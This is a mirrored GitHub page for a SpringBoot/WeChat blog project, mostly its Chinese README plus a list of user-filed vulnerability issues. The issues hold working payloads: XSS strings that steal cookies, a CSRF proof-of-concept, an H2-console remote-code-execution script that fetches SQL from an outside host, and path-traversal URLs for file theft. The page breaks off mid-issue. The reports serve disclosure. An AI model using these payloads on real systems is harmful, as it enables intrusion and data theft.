qinxuewu / blog-sharon Goto Github PK

View Code? Open in Web Editor NEW

112.0 5.0 54.0 7.75 MB

一款简单微信小程序个人博客。后端基于SpringBoot实现

License: Apache License 2.0

Dockerfile 0.03% Shell 0.03% Java 68.31% FreeMarker 31.03% CSS 0.61%

wechat springboot mysql blog wechat-weapp halo blog-sharon spring jdk8 html2wxml

blog-sharon's Introduction

blog-sharon

关于

email: [email protected]
CSDN: https://blog.csdn.net/u010391342
简书：https://www.jianshu.com/u/65eeb288a0d9
掘金: https://juejin.im/user/5a289b556fb9a0450e760117
个人博客：https://blog.qinxuewu.club

开源小项目

boot-actuator: 基于Spring Boot 实现的监控远程服务器多个Java应用JVM性能图形化工具
blog-sharon: 一款简单微信小程序个人博客
Mongodb-WeAdmin: SpringBoot版Mongodb工具

项目介绍

简单微信笔记小程序

文档

部署文档

项目架构

SpringBoot2.0 h2数据库
html2wxml 用于微信小程序的HTML和Markdown格式的富文本渲染组件，支持代码高亮部署小程序需要集成插件

体验地址

效果图如下

后端项目 Halo 可能是最好的 Java 博客系统。

Halo [ˈheɪloʊ]，意为光环。当然，你也可以当成拼音读(哈喽)。

轻快，简洁，功能强大，使用 Java 开发的博客系统。

blog-sharon's People

Contributors

Stargazers

Watchers

Forkers

pubfork joebeckham jerryfengchn shisanchanggong cdneitui xxd-china zhangjl1017 mcbbugu aocctu fuhaozhang yxiaozhou yuhaibao324 stevenceo jayfeihe yangxuechen reedfan spencerzhi hellokung dvil404 nkgfirecream xiaokangbuben poison-china davidmr001 lhchrispaul3 caojieliang houzhanwu yy461464502 brendahub zhangqianggit-2018 zhengxiaowei-github xinghl001 zhangvalue wobenlaijiuhenmei buhaijun weiguo21 liangzhang handu1314 fengzi12 yuyingqing garfield-lucky xiaodingdang8 17860543285 qingfeng5 reve75 jay-tian peizihui xiaoxingbobo ranqingyuan enjoywithsunshine jiazhizhong nmyangmo nomenofear comil4444

blog-sharon's Issues

新增/修改标签处XSS漏洞

![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/08269154-9513-4be8-9e14-4dcc35014e0d) ![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/025a876f-40ab-467f-9c5b-5137f6277076)

QQ群

为什么搜不到该QQ群，解散了吗

注册xss漏洞

注册的时候用户名填入</a> <img src/onerror=prompt(document.cookie)> <!--�

修复：
blog_title增加过滤

Unsafe component h2 is referenced, causing ldap injection

url: http://host:ip/h2-console
driver Class: org.h2.Driver
JDBC URL: jdbc:h2:mem:dbtest;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://xxx/files/h2.sql'
and the h2.sql below

CREATE ALIAS shel1 As $$void shel1(String s) throws Exception {
  java.lang.Runtime.getRuntime().exec(s);
}$$;
SELECT shel1('open -a Calculator.app');

vulnable environment
spring Boot + H2
spring.h2.console.enabled=true
JDK < 6u201、7u191、8u182、11.0.1（LDAP）

修复建议：禁用h2-console enable，或者升级jdk版本

任意文件读取漏洞

/admin/themes/getTpl

丝毫没有过滤

X-Forward-For导致的XSS漏洞

请求头添加了一个
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

修复建议：禁用多级代理

任意文件删除漏洞

/admin/backup/delBackup�
丝毫没有过滤

Comment section xss vulnerability

payload:commentAuthorUrl=
"><img src=1 onerror=alert(123)>

FrontCommentController:143

后台登录存储型xss漏洞

登录添加X-Forward-IP头

POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

触发链
AdminController.getLogin()
LogServiceImpl.save()
ServletUtil.getClietnIP()

A CSRF vulnerability and A XSS vulnerability in admin/tag/save

A CSRF vulnerability and A XSS vulnerability in article tag save was discovered in halo release v0.4.3

There is a CSRF vulnerability which allows remote attackers to send web page with CSRF script ,attackers could use this CSRF vulnerability add tag with XSS payload .

XSS Vulnerability url: https://demo.halo.run/admin/tag/save
CSRF Vulnerability url: https://demo.halo.run/admin/tag/save

CSRF payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.halo.run/admin/tag/save" method="POST">
      <input type="hidden" name="tagName" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tagUrl" value="123" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

xss payload

POST /admin/tag/save HTTP/1.1
Host: demo.halo.run
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://demo.halo.run/admin/tag
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Connection: close
Cookie: JSESSIONID=7pY4KPxPbsy7pPOuJ_5OghgiMpv14yT9XbfW_p20
Pragma: no-cache
Cache-Control: no-cache

tagName=%3Cscript%3Ealert(1)%3C%2Fscript%3E&tagUrl=123

when admin user post a article,the XSS payload in tag value would exec.

Directory traversal vulnerability causes arbitrary file downloads

The interface location： /admin/backup/sendToEmail

i send local files to my email by accepting this url
http://192.168.246.245:8081/admin/backup/sendToEmail?fileName=Users/xjj/sleep.sh&type=../../../../../..
The mail will then receive the local file

causes